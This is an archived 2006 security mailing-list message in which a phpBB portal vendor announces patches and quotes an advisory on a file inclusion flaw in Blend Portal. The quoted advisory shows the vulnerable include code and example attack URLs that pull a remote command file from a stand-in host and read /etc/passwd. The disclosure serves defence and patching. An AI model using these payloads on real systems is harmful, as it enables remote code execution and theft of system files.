[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <BAY103-F1486CBF2A15283AE39DC14E09D0@phx.gbl>
Date: Mon May 29 13:53:16 2006
From: austin_inc at hotmail.com (austin best)
Subject: RE: Advisory: Blend Portal <= 1.2.0 for phpBB
2.x(blend_data/blend_common.php) File Inclusion Vulnerability
I have addressed this issue & the one reported about the Activity Mod Plus.
Below is a link to patches for both. Thanks.
http://phpbb-tweaks.com/topics.html-p-17623#17623
Thanks For Your E-Mail
aUsTiN & Staff
For an interactinve phpBB Support board
http://phpbb-tweaks.com/
For a phpBB based portal & support
http://phpbb-portal.com/
For a phpBB based gaming system & support
http://phpbb-amod.com/
http://aUsTiN-Inc.net/
>From: Mustafa Can Bjorn IPEKCI <nukedx@...edx.com>
>To: submit@...w0rm.com,
>full-disclosure@...ts.grok.org.uk,bugtraq@...urityfocus.com,
>austin_inc@...mail.com
>Subject: Advisory: Blend Portal <= 1.2.0 for phpBB
>2.x(blend_data/blend_common.php) File Inclusion Vulnerability
>Date: Sun, 28 May 2006 20:46:39 +0300
>MIME-Version: 1.0
>Received: from king.anope.net ([67.15.88.53]) by
>bay0-mc10-f9.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830); Sun,
>28 May 2006 10:54:44 -0700
>Received: (qmail 1602 invoked from network); 28 May 2006 20:46:45 +0300
>Received: from localhost (@127.0.0.1) by localhost with SMTP; 28 May 2006
>20:46:44 +0300
>Received: from 85.103.237.117 ([85.103.237.117]) by
>webmail.nukedx.com(Horde MIME library) with HTTP; Sun, 28 May 2006 20:46:39
>+0300
>X-Message-Info: LsUYwwHHNt3IkD50dWx1Zh4q3nci+v36uLgoVBpjm50=
>User-Agent: Internet Messaging Program (IMP) H3 (4.1)
>Return-Path: nukedx@...edx.com
>X-OriginalArrivalTime: 28 May 2006 17:54:44.0992 (UTC)
>FILETIME=[CDAF6800:01C6827F]
>
>--Security Report--
>Advisory: Blend Portal <= 1.2.0 for phpBB 2.x
>(blend_data/blend_common.php) File Inclusion Vulnerability.
>---
>Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
>---
>Date: 28/05/06 07:52 PM
>---
>Contacts:{
>ICQ: 10072
>MSN/Email: nukedx@...edx.com
>Web: http://www.nukedx.com
>}
>---
>Vendor: phpbb-portal (http://www.phpbb-portal.com/)
>Version: 1.2.0 and prior versions must be affected.
>About: Via this methods remote attacker can include arbitrary
>internal/external files to phpBB. phpbb_root_path
>variable in /blend_data/blend_common.php did not sanitized properly before
>using it.You can find vulnerable code in
>blend_common.php at lines 74-77
>-Source in blend_common.php-
>74: else
>75: {
>76: include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH
>.'config.'. $phpEx);
>77: }
>-End of source-
>Level: Highly Critical
>---
>How&Example:
>Succesful exploitation needs register_globals on & allow url_fopen on
>GET ->
>http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
>EXAMPLE ->
>http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
>EXAMPLE ->
>http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00
>---
>Timeline:
>* 28/05/2006: Vulnerability found.
>* 28/05/2006: Contacted with vendor and waiting reply.
>---
>Exploit: http://www.nukedx.com/?getxpl=41
>---
>Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
>
_________________________________________________________________
Don’t just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
Powered by blists - more mailing lists